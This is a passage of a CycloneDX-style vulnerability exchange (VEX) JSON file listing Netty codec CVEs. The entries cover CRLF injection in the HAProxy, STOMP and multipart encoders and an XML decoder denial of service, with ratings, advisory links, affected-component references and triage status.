        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/pull/17213"
        },
        {
          "url": "https://github.com/netty/netty/pull/17217"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.137.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.17.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-8c42-7qj2-3j46"
        }
      ],
      "published": "2026-08-17T18:17:36+00:00",
      "updated": "2026-08-17T19:16:32+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59919",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's HAProxy encoder (\u00a0HAProxyMessageEncoder\u00a0) writes AF_UNIX source and destination socket addresses into the HAProxy V1 text protocol without validating them for CRLF characters, so an attacker who controls an AF_UNIX address can inject \u00a0\\r\\n\u00a0 sequences and split the single PROXY header into multiple lines. This is possible because the V1 protocol uses CRLF as its line terminator and, unlike IPv4/IPv6 addresses whose format checks implicitly reject CRLF, AF_UNIX addresses are only validated for length (up to 108 bytes), allowing a forged second PROXY header line that spoofs the client source/destination IP to a downstream server or load balancer. The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-haproxy to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59919"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59919"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-wh89-7897-x99h"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59919"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59919"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:33:28+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#7489f1b9-7127-4f17-8c04-437d70601ba3"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#d8ad0772-a581-45f2-9af4-18d5d8a558f8"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#70eead68-90f1-4aed-94b3-8485bb64ae81"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#ac550d31-623c-48f4-a9cb-04916412b3ec"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#e6ac5f9c-452e-4e55-aac2-fc530dc0bf86"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#e03af5af-316f-4750-ad8c-cf2740c26a49"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f5e87789-c100-47c1-a60a-589a2fb03284"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f0a2a5f2-49df-4395-9144-481c15aae411"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fa9ee652-e15e-4094-b0f3-cd970dca5d77"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#e93637aa-fac1-4870-83dc-e803d61f6461"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#d3a553f6-bafd-4393-87df-c9e41afbecc0"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#cdc12e27-e58e-40ed-81b6-6f919b282eba"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c6db3213-7051-4add-b91f-8ee0c449331b"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#pkg:maven/io.netty/netty-codec-haproxy@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d3211c70-e2e8-4a3d-b86e-fa3c0d672202"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59920",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. In versions prior to 4.1.136.Final and 4.2.16.Final, Netty's STOMP encoder (\u00a0StompSubframeEncoder\u00a0) does not escape or validate header values in \u00a0CONNECT\u00a0 and \u00a0CONNECTED\u00a0 frames, so raw newline (\u00a0\\n\u00a0) characters in a header value are written directly to the wire, allowing an attacker who controls a header value to inject additional STOMP headers. This happens because the encoder intentionally skips escaping for CONNECT/CONNECTED frames per the STOMP 1.2 specification but never rejects the raw newlines, and since a broker parses each line as a separate header, an attacker controlling a value such as a user-supplied login or passcode can overwrite connection parameters or add authentication/role headers to bypass authentication or escalate privileges (the actual impact is broker-dependent). The issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-stomp to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59920"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59920"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-3g8r-4pfx-jmfh"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59920"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59920"
        }
      ],
      "published": "2026-07-29T18:16:56+00:00",
      "updated": "2026-08-06T20:34:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#daf133bc-416d-4da0-ac59-db804e869790"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#8c5b7a87-2f75-4714-8b38-62f9f52196ff"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#ec6514c0-f6cc-4503-8a5f-d09edf28087a"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#c44a6acf-8f3e-467a-916f-17243d21a6b1"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#d66c92a5-1786-42e0-831c-ff0a95f73a76"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#cbbf95f9-2540-4420-8c0b-584bf7333103"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#ff1f1f0f-4729-4eb9-b5c1-63a9845b49f5"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#e69c714c-52a5-4036-8155-d8c0ed5fc387"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#f101a471-e340-418d-ab7d-83b218d2ee45"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#a53a265c-1866-45f7-8c35-5fe5cf57bd5a"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#f4c5fb82-b31f-4202-9413-7f48883585ef"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#b94bc43a-c12c-4fa3-afd4-563d78f424cb"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#97b7bf09-7cc7-46d2-818d-3ae5d6977fc6"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-stomp@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#7fd60386-a34a-4658-89bf-f4700493a101"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-59921",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "nvd"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
        }
      ],
      "cwes": [
        93
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to versions 4.1.136.Final and 4.2.16.Final, HttpPostRequestEncoder constructs multipart HTTP request bodies by directly concatenating user-supplied filenames and field names into Content-Disposition MIME headers without validating or sanitizing CRLF characters (\\r\\n). Since MIME headers are delimited by CRLF, an attacker who controls the filename can inject arbitrary MIME headers into the multipart body part. The root cause is that neither the encoder nor the FileUpload implementations' setFilename() methods, which only check for null, neutralize CRLF characters before the filename is embedded into the header. This issue has been fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-59921"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-59921"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-gcjf-9mgh-3p7g"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-59921"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-59921"
        }
      ],
      "published": "2026-07-28T23:17:09+00:00",
      "updated": "2026-08-07T15:05:47+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#e980273a-9a62-4a85-9c2f-8135cf54852a"
        },
        {
          "ref": "urn:cdx:73d55834-87d3-4722-a7e3-c6cb587cceef/1#452f36bc-1257-462e-be68-3441357bd4a9"
        },
        {
          "ref": "urn:cdx:fe591fb1-8d12-499d-9a3d-4e9300310a93/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:a6272316-dc84-49f5-9284-bc3d988ac189/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#e04de41b-97c5-498b-8d15-41f7208e534e"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#6891b98b-ab7c-4a7f-bbcc-d7028d024d43"
        },
        {
          "ref": "urn:cdx:dd96e91c-2aa2-42a6-9caf-9ecae8a8e0b0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#ffca2055-bdcc-48ba-a02b-7f8b4f05e1c5"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#fec8eff5-36f1-4f25-b97e-a7bb4895aca5"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#f15a5acf-0141-412d-9010-ad66c9ccc187"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#a91cdedd-b4a6-4470-838a-22b6acd43058"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#d416ae40-8589-4057-bb2c-448810064092"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#f474bdd3-7aa8-4a1a-aba9-80cac6870330"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#f747dabd-5f9f-403d-9f5d-4e4b2a0e3bbe"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#eba1d71f-41d0-4939-b973-98bcf343783e"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#fae2d073-4bb2-4b43-970a-b11ab31288b8"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#e6dc16b9-c4f8-4bf5-b25e-ce73ea6183e5"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#f23f68af-3e1a-4be8-9061-a42dc2e93cb8"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#c5d787ba-43fb-4c8b-b9b3-ebe7b50afaba"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#c8cfe000-6d4c-41e1-879a-4424e1d781ff"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#da8d2aa8-1d6b-457e-9269-50f2523ab3a3"
        },
        {
          "ref": "urn:cdx:9e52bd8b-4692-411e-a594-1f4bc7e86239/1#85fb2588-e32f-4881-92f4-6260c3e2ba74"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d7243a57-4232-41ee-8221-57f283cc9db2"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-73507",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is an asynchronous, event-driven network application framework. Prior to 4.1.136.Final and 4.2.16.Final, io.netty.handler.codec.xml.XmlFrameDecoder.decode() failed to preserve closing-tag parser state across invocations, so an unauthenticated remote attacker could trickle-feed repeated </ sequences that repeatedly rescanned the accumulated buffer and exhausted an EventLoop thread's CPU, causing denial of service with a maxFrameLength of 1 MB. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-xml to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-73507"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/pull/17063"
        },
        {
          "url": "https://github.com/netty/netty/pull/17065"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-v74w-7mr3-4qg3"
        }
      ],
      "published": "2026-08-13T15:20:17+00:00",
      "updated": "2026-08-15T04:18:25+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-xml@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:34a2b1e8-8fee-44bb-8522-99be9edccad7/1#f0e55b81-9bc4-4712-ac6d-3015ef1ec577"
        },
        {
          "ref": "urn:cdx:1e36ebb8-2013-4976-8409-fddb35c78e6f/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:51644b01-b63a-4f5f-9f35-126bdc4a618f/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2495bef4-0df1-4935-aa03-00be6c047746/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:abadbde8-c4d0-4a77-aa5b-65d43fe97f27/1#e79b4d94-a8d6-4453-9d94-0b64c6bbe282"
        },
        {
          "ref": "urn:cdx:28abfe1f-ced0-4485-9b01-aebcbaea4b2d/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:6b4dd6e7-67b6-4895-ae79-3021262d035e/1#efc2174c-7822-484c-9f4c-94264a1c0813"
        },
        {
          "ref": "urn:cdx:20b16bc2-245e-4e26-80bc-cb476cd6c83e/1#bc75cb50-2b58-4484-ba25-bc2d97b5633f"
        },
        {
          "ref": "urn:cdx:85a8dec1-3271-446f-81da-26103d63bd81/1#70c34d5f-f5fa-467b-aa8d-24226ad2dd73"
        },
        {
          "ref": "urn:cdx:864422ec-6556-4dfb-9405-34e3fac8e068/1#b49fc97b-ddc4-4b6a-9cf2-fa12f1f6387a"
        },
        {
          "ref": "urn:cdx:484d911f-7a75-4581-ab05-8d8006999dbc/1#d348257e-0320-4c86-a427-e5af1552af4f"
        },
        {
          "ref": "urn:cdx:20049334-d06e-47b4-b77c-154263d31ce1/1#dc026aab-3384-4bf1-8f3a-9e4db676d875"
        },
        {
          "ref": "urn:cdx:8ff941ca-53eb-4dd2-8467-ed75c28b6ce8/1#fe6bccd4-7bf1-4ca7-893f-354718132701"
        },
        {
          "ref": "urn:cdx:a40d86cf-f020-46d6-921b-c87990746230/1#f7cd90ad-7ef0-4650-b517-4b26fe48da64"
        },
        {
          "ref": "urn:cdx:792ac5b7-17a9-4643-adb1-c7411fe3284d/1#dd84b826-9ffe-4c3a-a0d1-591e55e7165b"
        },
        {
          "ref": "urn:cdx:5f57c46a-c6ad-4ff4-a508-4ca66032e200/1#daa1c284-50f5-4f8e-8bf5-24abbb67e252"
        },
        {
          "ref": "urn:cdx:a287ef68-c90f-4605-9a77-e688e36320c8/1#aaf82d26-8a05-4d18-845e-67d1ce867f12"
        },
        {
          "ref": "urn:cdx:4c3302bd-37b0-4f4e-bcb8-09114351aa81/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0d831fe4-325e-4a21-af84-498e305f6dc6/1#pkg:maven/io.netty/netty-codec-xml@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:0c3b0608-6d7a-43d8-95e5-f9d114311a89/1#d8c8853d-6f6d-4486-8b76-3383f3075bfb"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-73508",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        772
      ],
